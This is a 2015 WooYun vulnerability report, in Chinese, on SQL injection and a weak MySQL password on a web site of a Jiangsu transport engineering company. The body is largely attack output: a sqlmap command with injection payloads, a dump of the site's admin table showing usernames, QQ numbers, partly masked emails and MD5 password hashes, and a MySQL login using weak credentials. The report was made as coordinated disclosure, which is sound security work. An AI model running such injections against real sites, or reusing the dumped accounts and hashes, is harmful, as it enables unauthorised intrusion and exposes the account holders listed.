当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152641

漏洞标题:江苏省交通工程集团某分站SQL注入/弱口令

相关厂商:cncert国家互联网应急中心

漏洞作者: belief

提交时间:2015-11-08 20:43

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

sudo python sqlmap.py -u"http://**.**.**.**/news.asp?sort_name_id=345&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5" --threads=10 --dump -Tadmin
Place: GET
Parameter: sort_name_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sort_name_id=345 AND 7781=7781&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: sort_name_id=345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(122)&CHR(107)&CHR(106)&CHR(113)&CHR(101)&CHR(75)&CHR(83)&CHR(106)&CHR(121)&CHR(111)&CHR(122)&CHR(108)&CHR(104)&CHR(87)&CHR(113)&CHR(122)&CHR(118)&CHR(98)&CHR(113) FROM MSysAccessObjects%16&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5
---
[15:36:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| admin |
| gl |
| product |
| sort |
+---------+
Database: Microsoft_Access_masterdb
Table: admin
[16 entries]
+----+-----------+-----------------------------+------+---------+----------------------------------+
| id | qq | mail | data | admin | password |
+----+-----------+-----------------------------+------+---------+----------------------------------+
| 1 | 123123 | -1111 | <blank> | ?^\\?94 | 4297F44B13955235245B2497399D7A93 |
| 28 | 287285009 | lizhuoqing1986@**.**.**.** | <blank> | ?_q | 563CC309F3F29D1263222BDD347EA28F |
| 29 | 25458458 | ashire@**.**.**.** | <blank> | ?Q? | 4297F44B13955235245B2497399D7A93 |
| 30 | 123123123 | 123123123 | <blank> | 123123 | 4297F44B13955235245B2497399D7A93 |
| 33 | 87898989 | cwwww | <blank> | cwwww | 796E10AFA019E0B6612B2EE073718279 |
| 34 | 4545454 | cbbnnn | <blank> | cbbnnn | AEBFEE95E7CFEBFD9A9FF0618C4ED70C |
| 35 | 656565 | swoopp | <blank> | swoopp | 519123BB16453E16D12C66DD1E1584EA |
| 36 | 556565656 | weoopw | <blank> | weoopw | DEC507D5616BE577B7006FC438E61C01 |
| 37 | <blank> | <blank> | <blank> | wqroopp | CCA87A5C9CA79D732CB06C752135B59C |
| 38 | <blank> | <blank> | <blank> | qwoppp | F808CF103E34EC06FA41FE98E2A117CF |
| 39 | <blank> | <blank> | <blank> | wqqqww | E512C4F6F3854F620DC254B634E1F216 |
| 40 | <blank> | <blank> | <blank> | wqooow | B6B91D4C8F5654E6AFE942ACC8FE8D72 |
| 41 | <blank> | <blank> | <blank> | xwww200 | 2F08F1B5C51E6EB67DC4DD56907D2E82 |
| 42 | <blank> | <blank> | <blank> | wqrertt | 4CFD394A6B3C61CB1F96577161972AB6 |
| 43 | <blank> | <blank> | <blank> | w50000 | 60D6A7C3FD67C5DCD4FB1069D8EAA527 |
| 44 | <blank> | <blank> | <blank> | wqpoiii | 60D6A7C3FD67C5DCD4FB |
+----+-----------+-----------------------------+------+---------+----------------------------------+

漏洞证明:


mysql 弱口令
sudo mysql -h**.**.**.** -utest -ptesttest
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.36 sec)

修复方案:

过滤

版权声明:转载请注明来源 belief@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-19 18:12

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价